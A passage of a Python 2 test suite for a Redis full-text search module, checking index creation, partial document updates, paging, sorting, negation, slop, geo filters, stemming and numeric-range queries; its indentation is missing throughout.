# expected = ['INTERSECT {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
if env.is_cluster():
raise unittest.SkipTest()
res = env.cmd('ft.explainCli', 'idx', q)
expected = ['INTERSECT {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
env.assertEqual(expected, res)
def testNoIndex(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex', 'sortable'))
if not env.isCluster():
# to specific check on cluster, todo : change it to be generic enough
res = env.cmd('ft.info', 'idx')
env.assertEqual(res[7][1][4], 'NOINDEX')
env.assertEqual(res[7][2][6], 'NOINDEX')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'hello lorem ipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1, 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@extra:hello', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@num:[1 1]', 'nocontent')
env.assertListEqual([0], res)
def testPartial(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'SCORE_FIELD', '__score',
'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex'))
# print r.execute_command('ft.info', 'idx')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', '0.1', 'fields',
'foo', 'hello world', 'num', 2, 'extra', 'abba'))
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'asc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc1', '#1', 'doc2', '#2'], res)
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'desc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc2', '#2', 'doc1', '#1'], res)
# Updating non indexed fields doesn't affect search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'num', 3, 'extra', 'jorem gipsum'))
env.expect('ft.add', 'idx', 'doc12', '0.1', 'replace', 'partial',
'fields', 'num1', 'redis').equal('OK')
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'sortby', 'num', 'desc',)
assertResultsEqual(env, [2L, 'doc1', ['foo', 'hello world', 'num', '3','extra', 'jorem gipsum'],
'doc2', ['foo', 'hello world', 'num', '2', 'extra', 'abba']], res)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'withscores')
# Updating only indexed field affects search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'foo', 'wat wet'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = r.execute_command('ft.search', 'idx', 'wat', 'nocontent')
env.assertListEqual([1L, 'doc1'], res)
# Test updating of score and no fields
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertLess(float(res[2]), 1)
# env.assertListEqual([1L, 'doc1'], res)
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', '1.0', 'replace', 'partial', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
# We reindex though no new fields, just score is updated. this effects score
env.assertEqual(float(res[2]), 1)
# Test updating payloads
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertIsNone(res[2])
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '1.0',
'replace', 'partial', 'payload', 'foobar', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertEqual('foobar', res[2])
def testPaging(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1, 'fields',
'foo', 'hello', 'bar', i))
chunk = 7
offset = 0
while True:
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'desc', 'limit', offset, chunk)
env.assertEqual(res[0], N)
if offset + chunk > N:
env.assertTrue(len(res) - 1 <= chunk)
break
env.assertEqual(len(res), chunk + 1)
for n, id in enumerate(res[1:]):
env.assertEqual(int(id), N - 1 - (offset + n))
offset += chunk
chunk = random.randrange(1, 10)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'asc', 'limit', N, 10)
env.assertEqual(res[0], N)
env.assertEqual(len(res), 1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, -1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', -1, 10)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 2000000)
def testPrefix(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for _ in r.retry_with_rdb_reload():
waitForIndex(r, 'idx')
res = r.execute_command(
'ft.search', 'idx', 'constant term', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'const* term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'constant term1*', 'nocontent')
env.assertGreater(res[0], 2)
res = r.execute_command(
'ft.search', 'idx', 'const* -term*', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term9*', 'nocontent')
env.assertEqual([0], res)
def testSortBy(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text', 'sortable', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello%03d world' % i, 'bar', 100 - i))
for _ in r.retry_with_rdb_reload():
waitForIndex(r, 'idx')
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo', 'desc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'desc')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'asc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withscores', 'limit', '2', '5')
env.assertEqual(
[100L, 'doc2', '0', 'doc3', '0', 'doc4', '0', 'doc5', '0', 'doc6', '0'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual(
[100L, 'doc0', '#100', 'doc1', '#99', 'doc2', '#98', 'doc3', '#97', 'doc4', '#96'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'foo', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual([100L, 'doc99', '$hello099 world', 'doc98', '$hello098 world', 'doc97', '$hello097 world', 'doc96',
'$hello096 world', 'doc95', '$hello095 world'], res)
def testNot(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text'))
N = 10
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for i in range(5):
inclusive = r.execute_command(
'ft.search', 'idx', 'constant term%d' % i, 'nocontent', 'limit', 0, N)
exclusive = r.execute_command(
'ft.search', 'idx', 'constant -term%d' % i, 'nocontent', 'limit', 0, N)
exclusive2 = r.execute_command(
'ft.search', 'idx', '-(term%d)' % i, 'nocontent', 'limit', 0, N)
exclusive3 = r.execute_command(
'ft.search', 'idx', '(-term%d) (constant)' % i, 'nocontent', 'limit', 0, N)
env.assertNotEqual(inclusive[0], N)
env.assertEqual(inclusive[0] + exclusive[0], N)
env.assertEqual(exclusive3[0], exclusive2[0])
env.assertEqual(exclusive3[0], exclusive[0])
s1, s2, s3, s4 = set(inclusive[1:]), set(
exclusive[1:]), set(exclusive2[1:]), set(exclusive3[1:])
env.assertTrue(s1.difference(s2) == s1)
env.assertTrue(s1.difference(s3) == s1)
env.assertTrue(s1.difference(s4) == s1)
env.assertTrue(s2 == s3)
env.assertTrue(s2 == s4)
env.assertTrue(s2.intersection(s1) == set())
env.assertTrue(s3.intersection(s1) == set())
env.assertTrue(s4.intersection(s1) == set())
# NOT on a non existing term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -dasdfasdf', 'nocontent')[0], N)
# not on env term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -constant', 'nocontent'), [0])
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -(term0|term1|term2|term3|term4|nothing)', 'nocontent'), [0])
# env.assertEqual(r.execute_command('ft.search', 'idx', 'constant -(term1 term2)', 'nocontent')[0], N)
def testNestedIntersection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'a', 'text', 'b', 'text', 'c', 'text', 'd', 'text'))
for i in range(20):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'a', 'foo', 'b', 'bar', 'c', 'baz', 'd', 'gaz'))
res = [
r.execute_command('ft.search', 'idx',
'foo bar baz gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@a:foo @b:bar @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@b:bar @a:foo @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@c:baz @b:bar @a:foo @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@d:gaz @c:baz @b:bar @a:foo', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@a:foo (@b:bar (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@c:baz (@a:foo (@b:bar (@c:baz @d:gaz)))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@b:bar (@a:foo (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@d:gaz (@a:foo (@c:baz @b:bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar baz gaz)', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (baz gaz))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (foo bar) (foo bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (foo (bar baz (gaz)))', 'nocontent'),
r.execute_command('ft.search', 'idx', 'foo (foo (bar (baz (gaz (foo bar (gaz))))))', 'nocontent')]
for i, r in enumerate(res):
# print i, res[0], r
env.assertListEqual(res[0], r)
def testInKeys(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'foo', 'text'))
for i in range(200):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world'))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
for keys in (
['doc%d' % i for i in range(10)], ['doc%d' % i for i in range(0, 30, 2)], [
'doc%d' % i for i in range(99, 0, -5)]
):
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', len(keys), *keys)
env.assertEqual(len(keys), res[0])
env.assertTrue(all((k in res for k in keys)))
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', 3, 'foo', 'bar', 'baz')[0])
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', 99)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', -1)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'inkeys', 4, 'foo')
def testSlopInOrder(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 't1 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1, 'fields',
'title', 't1 t3 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3', 1, 'fields',
'title', 't1 t3 t4 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc4', 1, 'fields',
'title', 't1 t3 t4 t5 t2'))
res = r.execute_command(
'ft.search', 'idx', 't1|t4 t3|t2', 'slop', '0', 'inorder', 'nocontent')
env.assertEqual({'doc3', 'doc4', 'doc2', 'doc1'}, set(res[1:]))
res = r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'inorder')[0])
env.assertEqual(1, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '0', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '1', 'inorder')[0])
env.assertEqual(3, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '2', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '3', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'inorder')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't t1', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4', 'inorder')[0])
def testExact(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
res = r.execute_command(
'ft.search', 'idx', '"hello world"', 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', "hello \"another world\"", 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testGeoErrors(env):
env.expect('flushall')
env.expect('ft.create idx ON HASH schema name text location geo').equal('OK')
env.expect('ft.add idx hotel 1.0 fields name hill location -0.1757,51.5156').equal('OK')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1 km').equal([0L])
# Insert error - works fine with out of keyspace implementation
# env.expect('ft.add', 'idx', 'hotel1', 1, 'fields', 'name', '_hotel1', 'location', '1, 1').error() \
# .contains('Could not index geo value')
# Query errors
env.expect('ft.search idx hilton geofilter location lon 51.5156 1 km').error() \
.contains('Bad arguments for <lon>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location 51.5156 lat 1 km').error() \
.contains('Bad arguments for <lat>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 radius km').error() \
.contains('Bad arguments for <radius>: Could not convert argument to expected type')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1 fake').error() \
.contains('Unknown distance unit fake')
env.expect('ft.search idx hilton geofilter location -0.1757 51.5156 1').error() \
.contains('GEOFILTER requires 5 arguments')
def testGeo(env):
r = env
gsearch = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', query, 'geofilter', 'location', lon, lat, dist, unit, 'LIMIT', 0, 20)
gsearch_inline = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', '{} @location:[{} {} {} {}]'.format(query, lon, lat, dist, unit), 'LIMIT', 0, 20)
env.assertOk(r.execute_command('ft.create', 'idx', 'ON', 'HASH',
'schema', 'name', 'text', 'location', 'geo'))
for i, hotel in enumerate(hotels):
env.assertOk(r.execute_command('ft.add', 'idx', 'hotel{}'.format(i), 1.0, 'fields', 'name',
hotel[0], 'location', '{},{}'.format(hotel[2], hotel[1])))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
res = r.execute_command('ft.search', 'idx', 'hilton')
env.assertEqual(len(hotels), res[0])
res = gsearch('hilton', "-0.1757", "51.5156", '1')
env.assertEqual(3, res[0])
env.assertIn('hotel2', res)
env.assertIn('hotel21', res)
env.assertIn('hotel79', res)
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '1')
env.assertListEqual(res, res2)
res = gsearch('hilton', "-0.1757", "51.5156", '10')
env.assertEqual(14, res[0])
res2 = gsearch('hilton', "-0.1757", "51.5156", '10000', 'm')
env.assertListEqual(sorted(res), sorted(res2))
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '10')
env.assertListEqual(sorted(res), sorted(res2))
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'm')
env.assertEqual(1, res[0])
env.assertEqual('hotel94', res[1])
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'm')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res2[0])
env.assertListEqual(sorted(res), sorted(res2))
res = gsearch('heathrow', -0.44155, 51.45865, '5', 'km')
env.assertEqual(3, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '5', 'km')
env.assertListEqual(sorted(res), sorted(res2))
def testTagErrors(env):
env.expect("ft.create", "test", 'ON', 'HASH',
"SCHEMA", "tags", "TAG").equal('OK')
env.expect("ft.add", "test", "1", "1", "FIELDS", "tags", "alberta").equal('OK')
env.expect("ft.add", "test", "2", "1", "FIELDS", "tags", "ontario. alberta").equal('OK')
def testGeoDeletion(env):
if env.is_cluster():
raise unittest.SkipTest()
# Can't properly test if deleted on cluster
env.expect('ft.config', 'set', 'FORK_GC_CLEAN_THRESHOLD', 0).ok()
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema',
'g1', 'geo', 'g2', 'geo', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc3', 1.0, 'fields',
'g1', "-0.1757,51.5156",
't1', "hello")
# keys are: "geo:idx/g1" and "geo:idx/g2"
env.assertEqual(3, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g1')[0]))
env.assertEqual(2, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g2')[0]))
# Remove the first doc
env.cmd('ft.del', 'idx', 'doc1')
for _ in range(100):
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
env.assertEqual(2, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g1')[0]))
env.assertEqual(1, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g2')[0]))
# Replace the other one:
env.cmd('ft.add', 'idx', 'doc2', 1.0,
'replace', 'fields',
't1', 'just text here')
for _ in range(100):
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
env.assertEqual(1, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g1')[0]))
env.assertEqual(0, len(env.cmd('FT.DEBUG DUMP_NUMIDX idx g2')[0]))
def testInfields(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH',
'schema', 'title', 'text', 'weight', 10.0, 'body', 'text', 'weight', 1.0))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello world lorem ipsum',
'body', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', 'hello', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"hello world\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"lorem ipsum\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', "infields", 2, "body", "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
def testScorerSelection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text', 'body', 'text'))
# this is the default scorer
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'TFIDF')
env.assertEqual(res, [0])
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'NOSUCHSCORER')
def testFieldSelectors(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'PREFIX', 1, 'doc',
'schema', 'TiTle', 'text', 'BoDy', 'text', "יוניקוד", 'text', 'field.with,punct', 'text'))
#todo: document as breaking change, ft.add fields name are not case insentive
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'TiTle', 'hello world', 'BoDy', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 0.5, 'fields',
'BoDy', 'hello world', 'TiTle', 'foo bar', 'יוניקוד', 'unicode', 'field.with,punct', 'punt'))
res = r.execute_command(
'ft.search', 'idx', '@TiTle:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc1'])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:hello @TiTle:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:hello world @TiTle:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo) @TiTle:(world|bar)', 'nocontent')
env.assertEqual(sorted(res), sorted([2, 'doc1', 'doc2']))
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo world|bar)', 'nocontent')
env.assertEqual(sorted(res), sorted([2, 'doc1', 'doc2']))
res = r.execute_command(
'ft.search', 'idx', '@BoDy|TiTle:(hello world)', 'nocontent')
env.assertEqual(sorted(res), sorted([2, 'doc1', 'doc2']))
res = r.execute_command(
'ft.search', 'idx', '@יוניקוד:(unicode)', 'nocontent')
env.assertEqual(sorted(res), sorted([2, 'doc1', 'doc2']))
res = r.execute_command(
'ft.search', 'idx', '@field\\.with\\,punct:(punt)', 'nocontent')
env.assertEqual(sorted(res), sorted([2, 'doc1', 'doc2']))
def testStemming(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello kitties'))
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "verbatim")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
# test for unknown language
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "language", "foofoofian")
def testExpander(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
res = r.execute_command(
'ft.search', 'idx', 'kitties',
"nocontent",
"expander", "SBSTEM"
)
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitties', "nocontent", "expander", "noexpander")
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent", 'verbatim')
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
# Calling a stem directly works even with VERBATIM.
# You need to use the + prefix escaped
res = r.execute_command(
'ft.search', 'idx', '\\+kitti', "nocontent", 'verbatim')
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
def testNumericRange(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'ON', 'HASH', 'schema', 'title', 'text', 'score', 'numeric', 'price', 'numeric'))
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 5).error().contains("FILTER requires 3 arguments")
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 5, 'inf').error().contains("Bad upper range: inf")
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 'inf', 5).error().contains("Bad lower range: inf")
for i in xrange(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'fields',
'title', 'hello kitty', 'score', i, 'price', 100 + 10 * i))
for _ in r.retry_with_rdb_reload():
waitForIndex(env, 'idx')
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 100)
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 50)
env.assertEqual(51, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', 'verbatim', "nocontent", "limit", 0, 100,
"filter", "score", "(0", "(50")
env.assertEqual(49, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", "-inf", "+inf")
env.assertEqual(100, res[0])
# test multi filters
scrange = (19, 90)
prrange = (290, 385)
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", scrange[
0], scrange[1],
"filter", "price", prrange[0], prrange[1])
# print res
for doc in res[2::2]:
sc = int(doc[doc.index('score') + 1])
pr = int(doc[doc.index('price') + 1])
env.assertTrue(sc >= scrange[0] and sc <= scrange[1])
env.assertGreaterEqual(pr, prrange[0])
env.assertLessEqual(pr, prrange[1])
env.assertEqual(10, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", "19", "90",
"filter", "price", "90", "185")
env.assertEqual(0, res[0])
# Test numeric ranges as part of query syntax
res = r.execute_command(
